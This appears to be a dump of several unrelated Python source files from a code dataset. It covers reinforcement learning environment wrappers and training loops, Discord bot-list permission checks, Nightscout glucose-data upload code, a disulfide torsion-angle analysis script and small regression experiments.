DDPG - 5K episodes take around 12h, and it takes around 15-20K to get score 255
"""
def __init__(self):
self.name = 'Bipedal Walker'
self.file_name = 'bipedal-walker-v2'
self.env = gym.make('BipedalWalker-v2')
self.input_type = INPUT_TYPE_OBSERVATION_VECTOR
self.input_dims = [24] # Box(24,)
self.is_discrete_action_space = False
self.n_actions = 4 # Box(4,)
self.action_boundary = [1, 1, 1, 1]
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 1000000
self.memory_batch_size = 64
# Atari:
def stack_frames(stacked_frames, frame): # to get a sense of motion. observation == frame, prev s == stacked_frames
if stacked_frames is None: # start of the episode: duplicate frame
return np.repeat(frame, repeats=ATARI_FRAMES_STACK_SIZE, axis=2)
else: # remove first frame, and add frame to the end
return np.concatenate((stacked_frames[:, :, 1:], frame), axis=2)
class Breakout(BaseEnv):
"""
Continuous observation space (210,160,3 D).
Discrete action space (1D).
Actions (4)
"""
def __init__(self):
self.name = 'Breakout'
self.file_name = 'breakout-v0'
self.env = gym.make('Breakout-v0')
self.input_type = INPUT_TYPE_STACKED_FRAMES
self.image_channels = ATARI_IMAGE_CHANNELS_GRAYSCALE
self.relevant_screen_size = (180, 160)
self.input_dims = (*self.relevant_screen_size, ATARI_FRAMES_STACK_SIZE) # Box(210,160,3)
self.is_discrete_action_space = True
self.n_actions = 3 # Discrete(4)
self.action_space = [1, 2, 3]
self.GAMMA = 0.99
self.EPS_MIN = None
self.memory_size = 6000 # saving transitions (stacked frames): 6-7K --> ~16Gb RAM, 25K --> ~48Gb RAM
self.memory_batch_size = 32
def get_state(self, observation, prev_s):
pre_processed_o = self.preprocess_image(observation)
s = stack_frames(prev_s, pre_processed_o)
return s
def preprocess_image(self, o):
o = o[30:, :] # crop
if self.image_channels == ATARI_IMAGE_CHANNELS_GRAYSCALE: # adjust channels from RGB to Grayscale
o = np.mean(o, axis=2)[:, :, np.newaxis] # .reshape((*self.relevant_screen_size, 1))
o = normalize(o)
return o
class SpaceInvaders(BaseEnv):
"""
Continuous observation space (210,160,3 D).
Discrete action space (1D).
Actions (6): none (0), fire (1), right (2), left (3), right & fire (4), left & fire (5)
"""
def __init__(self):
self.name = 'Space Invaders'
self.file_name = 'space-invaders-v0'
self.env = gym.make('SpaceInvaders-v0')
self.input_type = INPUT_TYPE_STACKED_FRAMES
self.image_channels = ATARI_IMAGE_CHANNELS_GRAYSCALE
self.relevant_screen_size = (185, 95)
self.input_dims = (*self.relevant_screen_size, ATARI_FRAMES_STACK_SIZE) # Box(210,160,3)
self.is_discrete_action_space = True
self.n_actions = 6 # Discrete(6)
self.action_space = [i for i in range(self.n_actions)]
self.GAMMA = 0.95 # 0.9 in PG tf.
self.EPS_MIN = None
self.memory_size = 5000
self.memory_batch_size = 32
def get_state(self, observation, prev_s):
pre_processed_o = self.preprocess_image(observation)
s = stack_frames(prev_s, pre_processed_o)
return s
def preprocess_image(self, o):
o = o[15:200, 30:125] # crop
if self.image_channels == ATARI_IMAGE_CHANNELS_GRAYSCALE: # adjust channels from RGB to Grayscale
o = np.mean(o, axis=2)[:, :, np.newaxis] # .reshape((*self.relevant_screen_size, 1))
o = normalize(o)
return o
@staticmethod
def update_reward(reward, done, info):
"""
Penalize the agent for losing (0 number of lives).
ALE is the emulator on which the open ai gym's Atari library is built.
"""
if done and info['ale.lives'] == 0:
return reward - 100
return reward
|
991,493 | 630b2bb65e1686cfd2e3782e219caa24056c892a | """
Permission Related Code
"""
from .helpers import *
from .imports import *
class StaffMember(BaseModel):
"""Represents a staff member in Fates List"""
name: str
id: Union[str, int]
perm: int
staff_id: Union[str, int]
async def is_staff_unlocked(bot_id: int, user_id: int):
return await redis_db.exists(f"fl_staff_access-{user_id}:{bot_id}")
async def is_bot_admin(bot_id: int, user_id: int):
try:
user_id = int(user_id)
except ValueError:
return False
if (await is_staff(staff_roles, user_id, 4))[0] and (await is_staff_unlocked(bot_id, user_id)):
return True
check = await db.fetchval("SELECT COUNT(1) FROM bot_owner WHERE bot_id = $1 AND owner = $2", bot_id, user_id)
if check == 0:
return False
return True
async def is_staff(staff_json: dict, user_id: int, base_perm: int, json: bool = False, *, redis=None) -> Union[bool, int, StaffMember]:
redis = redis if redis else redis_db
if user_id < 0:
staff_perm = None
else:
staff_perm = await redis_ipc_new(redis, "GETPERM", args=[str(user_id)])
if not staff_perm:
staff_perm = {"fname": "Unknown", "id": "0", "staff_id": "0", "perm": 0}
else:
staff_perm = orjson.loads(staff_perm)
sm = StaffMember(name = staff_perm["fname"], id = staff_perm["id"], staff_id = staff_perm["staff_id"], perm = staff_perm["perm"]) # Initially
rc = True if sm.perm >= base_perm else False
if json:
return rc, sm.perm, sm.dict()
return rc, sm.perm, sm |
991,494 | d89d454eca7ff2db6405b5539702046543a60dac | a,b = input().split()
c = len(set(list(a)))
b = len(set(list(b)))
if b == c:
print("yes")
else:
print("no")
|
991,495 | 378a85f3f2960c3f61aed8d79c09bf7acc9e3a16 | import numpy as np
import torch
import gym
import argparse
import os
import utils
import TD3
import kerbal_rl.env as envs
def generate_input(obs) :
mean_altitude = obs[1].mean_altitude
speed = obs[1].vertical_speed
dry_mass = obs[0].dry_mass
mass = obs[0].mass
max_thrust = obs[0].max_thrust
thrust = obs[0].thrust
goal = obs[2]
input = ((mean_altitude, speed, dry_mass, mass, max_thrust, thrust, goal))
return input
# Runs policy for X episodes and returns average reward
def evaluate_policy(policy, eval_episodes=1):
avg_reward = 0.
for _ in range(eval_episodes):
obs = env.reset()
done = False
input = generate_input(obs)
while not done:
action = policy.select_action(np.array(input))
obs, reward, done, _ = env.step(action)
avg_reward += reward
avg_reward /= eval_episodes
print ("---------------------------------------")
print ("Evaluation over %d episodes: %f" % (eval_episodes, avg_reward))
print ("---------------------------------------")
return avg_reward
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--policy_name", default="TD3") # Policy name
parser.add_argument("--seed", default=0, type=int) # Sets Gym, PyTorch and Numpy seeds
parser.add_argument("--start_timesteps", default=2e4, type=int) # How many time steps purely random policy is run for
parser.add_argument("--eval_freq", default=5e2, type=float) # How often (time steps) we evaluate
parser.add_argument("--max_timesteps", default=1e6, type=float) # Max time steps to run environment for
parser.add_argument("--save_models", action="store_true") # Whether or not models are saved
parser.add_argument("--expl_noise", default=0.1, type=float) # Std of Gaussian exploration noise
parser.add_argument("--batch_size", default=200, type=int) # Batch size for both actor and critic
parser.add_argument("--discount", default=0.99, type=float) # Discount factor
parser.add_argument("--tau", default=0.005, type=float) # Target network update rate
parser.add_argument("--policy_noise", default=0.2, type=float) # Noise added to target policy during critic update
parser.add_argument("--noise_clip", default=0.5, type=float) # Range to clip target policy noise
parser.add_argument("--policy_freq", default=2, type=int) # Frequency of delayed policy updates
args = parser.parse_args()
file_name = "%s_%s_%s" % (args.policy_name, 'hover_v0', str(args.seed))
print ("---------------------------------------")
print ("Settings: %s" % (file_name))
print ("---------------------------------------")
if not os.path.exists("./results"):
os.makedirs("./results")
if args.save_models and not os.path.exists("./pytorch_models"):
os.makedirs("./pytorch_models")
# env = kerbal_rl.make('hover_v0')
env = envs.hover_v0()
# Set seeds
torch.manual_seed(args.seed)
np.random.seed(args.seed)
state_dim = 7 # custom
action_dim = 1
max_action = env.action_max
# Initialize policy
policy = TD3.TD3(state_dim, action_dim, max_action)
replay_buffer = utils.ReplayBuffer()
# Evaluate untrained policy
evaluations = [evaluate_policy(policy)]
total_timesteps = 0
timesteps_since_eval = 0
episode_num = 0
done = True
while total_timesteps < args.max_timesteps:
if done:
if total_timesteps != 0:
print('Total T : ', total_timesteps, ' Episode Num : ', episode_num, ' Episode : ', episode_timesteps, ' Reward : ', episode_reward)
policy.train(replay_buffer, episode_timesteps, args.batch_size, args.discount, args.tau, args.policy_noise, args.noise_clip, args.policy_freq)
# Evaluate episode
if timesteps_since_eval >= args.eval_freq:
timesteps_since_eval %= args.eval_freq
evaluations.append(evaluate_policy(policy))
if args.save_models: policy.save(file_name, directory="./pytorch_models")
np.save("./results/%s" % (file_name), evaluations)
# Reset environment
obs = env.reset()
done = False
episode_reward = 0
episode_timesteps = 0
episode_num += 1
obs = generate_input(obs)
# Select action randomly or according to policy
if total_timesteps < args.start_timesteps:
action = env.sample_action_space()
else:
action = policy.select_action(np.array(obs))
if args.expl_noise != 0:
action = (action + np.random.normal(0, args.expl_noise, size=env.action_space)).clip(env.action_min, env.action_max)
# Perform action
new_obs, reward, done, _ = env.step(action)
new_obs = generate_input(new_obs)
done_bool = float(done)
episode_reward += reward
# Store data in replay buffer
replay_buffer.add((obs, new_obs, action, reward, done_bool))
obs = new_obs
print('goal : ', obs[6])
episode_timesteps += 1
total_timesteps += 1
timesteps_since_eval += 1
# Final evaluation
evaluations.append(evaluate_policy(policy))
if args.save_models: policy.save("%s" % (file_name), directory="./pytorch_models")
np.save("./results/%s" % (file_name), evaluations)
|
991,496 | 015a82703bd5e83ae8d4baa835cf4dfc3cb9d648 | import json
import arrow
import logging
from ..parser.tconnect import TConnectEntry
from ..parser.nightscout import NightscoutEntry
logger = logging.getLogger(__name__)
def process_cgm_events(readingData):
data = []
for r in readingData:
data.append(TConnectEntry.parse_reading_entry(r))
return data
"""
Given reading data and a time, finds the BG reading event which would have
been the current one at that time. e.g., it looks before the given time,
not after.
This is a heuristic for checking whether the BG component of a bolus was
manually entered or inferred based on the pump's CGM.
"""
def find_event_at(cgmEvents, find_time):
find_t = arrow.get(find_time)
events = list(map(lambda x: (arrow.get(x["time"]), x), cgmEvents))
events.sort()
closestReading = None
for t, r in events:
if t > find_t:
break
closestReading = r
return closestReading
"""
Given processed CGM data, adds reading entries to Nightscout.
"""
def ns_write_cgm_events(nightscout, cgmEvents, pretend=False):
logger.debug("ns_write_cgm_events: querying for last uploaded entry")
last_upload = nightscout.last_uploaded_bg_entry()
last_upload_time = None
if last_upload:
last_upload_time = arrow.get(last_upload["dateString"])
logger.info("Last Nightscout CGM upload: %s" % last_upload_time)
add_count = 0
for event in cgmEvents:
created_at = event["time"]
if last_upload_time and arrow.get(created_at) <= last_upload_time:
if pretend:
logger.info("Skipping CGM event before last upload time: %s" % event)
continue
entry = NightscoutEntry.entry(
sgv=event["bg"],
created_at=created_at
)
add_count += 1
logger.info(" Processing cgm reading: %s entry: %s" % (event, entry))
if not pretend:
nightscout.upload_entry(entry, entity='entries')
return add_count
|
991,497 | 6ca2be7f4bf28f42e6dc9dc89f276f36225d0e99 | # Classify images of dogs & cats
# dataset is Kaggle's Dogs vs Cats
# First, clustering the SURF features for all images
# Second, represent each image by its feature counts of clusters (BOF)
# Finally, logistic regression to classify dog or cat |
991,498 | 31280b53a821644a1ba4a8b72599857a80c3b427 | # Filename: calc_ssXtorisons.py
# Author: Evelyne Deplazes
# Date: May 5, 2018
# Script to calculate the five torsion angles that are defined by the
# two residues that form a disulfide bbond (see below for defintion of
# torsion angles)
# the script relies on the definition of the disulfdie bonds by the keyword SSBOND
# in the HEADER of the PDB file (example below)
# SSBOND 1 CYS A 3 CYS A 20 1555 1555 2.03
# SSBOND 2 CYS A 7 CYS A 16 1555 1555 2.03
# the script reqires the standart python libraries umpy, sys, math and glob
# as well as the library MDAnalysis https://www.mdanalysis.org
# The script loops through all .pdb files in a the current folder.
# For each .pdb file the script calculates the average for each
# of the five torsion angles.
# for PDB files with multiple models, the CA-CA distances are
# averaged over all models.
# the script produces the following output files:
# histograms for each of the five torsion angles calculated from all .pdb files
# ----- defintion of torsion angles -----
# the CYS residues that form the SSbond define 5 torsion angles
# formed by the N CA CB and S atoms of residues Cys i and Cys j
# tosions and atoms involved (based on schematic in Fig 1 in
# Sirinivasan et al, J Peptide Research, 1990
# Xss = CBi Si Sj CBj
# Xi1 = Ni CAi CBi Si
# Xj1 = Nj CAj CBj Sj
# Xi2 = CAi CBi Si Sj
# Xj2 = CAj CBj Sj Si
import glob
import re
import numpy as np
import sys, os
import math as math
import numpy as np
import MDAnalysis as MDA
import MDAnalysis.analysis.distances as distances
Xss_all = []
Xi1_all = []
Xi2_all = []
Xj1_all = []
Xj2_all = []
f1=str("ssXtorsions_Xss_hist.dat")
outfile1=open(f1, 'w')
f2=str("ssXtorsions_Xi1_hist.dat")
outfile2=open(f2, 'w')
f3=str("ssXtorsions_Xj1_hist.dat")
outfile3=open(f3, 'w')
f4=str("ssXtorsions_Xi2_hist.dat")
outfile4=open(f4, 'w')
f5=str("ssXtorsions_Xj2_hist.dat")
outfile5=open(f5, 'w')
for pdb_file in glob.glob('*.pdb'):
print "processing pdb file", pdb_file, "................"
multiple_chains = 0
# check if file has mulitiple chains, if so, skip this pdb file
p1 = re.compile('(COMPND)[a-z]*')
infile=open(pdb_file,'r') #open pdb file
line=infile.readline()
while (line):
if p1.match(line):
#print line
if line.find('B;') > 0:
print "found more than one chain in pdb file"
multiple_chains=1
line =infile.readline()
if multiple_chains == 1:
print "pdb file excluded due to multiple chains", pdb_file
else:
#print "calculating ssbond torsion angle for pdb file", pdb_file, "................"
#sys.exit()
# process pdb file
# find number of ss-bonds in the structure
# by looking for the SSBOND keyword in the .pdb file
# for each ssbond, get residue numbers involved
p = re.compile('(SSBOND)[a-z]*')
count_ssbonds = 0
resid_i=[]
resid_j=[]
infile=open(pdb_file,'r') #open pdb file
line=infile.readline()
while (line):
if p.match(line):
count_ssbonds = count_ssbonds + 1
resid_i.append(int(line[19:21]))
resid_j.append(int(line[33:35]))
line =infile.readline()
#print pdb_file, count_ssbonds
#print resid1, resid2
# load the pdb file with MDAnalysis
# select protein and find number of frames/models
u = MDA.Universe(pdb_file)
peptide=u.select_atoms("protein").residues
num_models = len(u.trajectory)
# for each ssbond, loop through pdb models and
# calculate the torsion angles
for ssbond in range(0,count_ssbonds):
# select CA in ssbonds
#print "------------", ssbond
Xss = []
Xi1 = []
Xj1 = []
Xi2 = []
Xj2 = []
selection = 'resid {} and name {}'
CAi = selection.format(resid_i[ssbond], 'CA')
CAj = selection.format(resid_j[ssbond], 'CA')
CBi = selection.format(resid_i[ssbond], 'CB')
CBj = selection.format(resid_j[ssbond], 'CB')
Si = selection.format(resid_i[ssbond], 'SG')
Sj = selection.format(resid_j[ssbond], 'SG')
Ni = selection.format(resid_i[ssbond], 'N')
Nj = selection.format(resid_j[ssbond], 'N')
# Xss = CBi Si Sj CBj
Xss_atoms = [CBi, Si, Sj, CBj]
print Xss_atoms
# Xi1 = Ni CAi CBi Si
Xi1_atoms = [Ni, CAi, CBi, Si]
# Xj1 = Nj CAj CBj Sj
Xj1_atoms = [Nj, CAj, CBj, Sj]
# Xi2 = CAi CBi Si Sj
Xi2_atoms = [CAi, CBi, Si, Sj]
# Xj2 = CAj CBj Sj Si
Xj2_atoms = [CAj, CBj, Sj, Si]
Xss_angle = sum([u.select_atoms(atom) for atom in Xss_atoms]) # sum of Atoms creates an AtomGroup
Xss_angle = Xss_angle.dihedral # convert AtomGroup to Dihedral object
Xi1_angle = sum([u.select_atoms(atom) for atom in Xi1_atoms])
Xi1_angle = Xi1_angle.dihedral
Xj1_angle = sum([u.select_atoms(atom) for atom in Xj1_atoms])
Xj1_angle = Xj1_angle.dihedral
Xi2_angle = sum([u.select_atoms(atom) for atom in Xi2_atoms])
Xi2_angle = Xi2_angle.dihedral
Xj2_angle = sum([u.select_atoms(atom) for atom in Xj2_atoms])
Xj2_angle = Xj2_angle.dihedral
for ts in u.trajectory[0:num_models:1]:
Xss.append(Xss_angle.value())
Xss_all.append(Xss_angle.value())
Xi1.append(Xi1_angle.value())
Xi1_all.append(Xi1_angle.value())
Xj1.append(Xj1_angle.value())
Xj1_all.append(Xj1_angle.value())
Xi2.append(Xi2_angle.value())
Xi2_all.append(Xi2_angle.value())
Xj2.append(Xj2_angle.value())
Xj2_all.append(Xj2_angle.value())
print "collected data on torsion angles for", len(Xss_all), "ss-bonds from ", len(glob.glob('*.pdb')), "pdb files"
# get histogram for Xss_all
hist, bin_edges = np.histogram(Xss_all, bins=50, density=True)
for i in range(0,len(hist)):
hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
outfile1.write(hist_string)
outfile1.close()
hist, bin_edges = np.histogram(Xi1_all, bins=50, density=True)
for i in range(0,len(hist)):
hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
outfile2.write(hist_string)
outfile2.close()
hist, bin_edges = np.histogram(Xj1_all, bins=50, density=True)
for i in range(0,len(hist)):
hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
outfile3.write(hist_string)
outfile3.close()
hist, bin_edges = np.histogram(Xi2_all, bins=50, density=True)
for i in range(0,len(hist)):
hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
outfile4.write(hist_string)
outfile4.close()
hist, bin_edges = np.histogram(Xj2_all, bins=50, density=True)
for i in range(0,len(hist)):
hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
outfile5.write(hist_string)
outfile5.close()
|
991,499 | f06972da07df5266400b718fb2f969c5e34a1459 | from functions import *
df, target = get_dataset()
X_train, X_test, y_train, y_test = train_test_split(df, target, test_size=0.33, random_state=42)
mean_value = np.mean(y_train)
print(mean_value)
y_pred_mean = [mean_value for _ in range(len(y_test))]
mean_squared_error(y_test, y_pred_mean, squared=False)
model = AdaBoostRegressor(learning_rate=0.01, n_estimators=100)
model.fit(X_train, y_train)
predicitons = model.predict(X_test)
rmse = mean_squared_error(y_test, predicitons, squared=False)
print(rmse)
model = CatBoostRegressor(iterations=1000, random_seed=42, loss_function='RMSE', logging_level='Verbose')
model.fit(
X_train, y_train,
eval_set=(X_test, y_test),
logging_level='Verbose', # you can uncomment this for text output
plot=True
);
model = LinearRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
rmse = mean_squared_error(y_test, y_pred, squared=False)
print(rmse)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.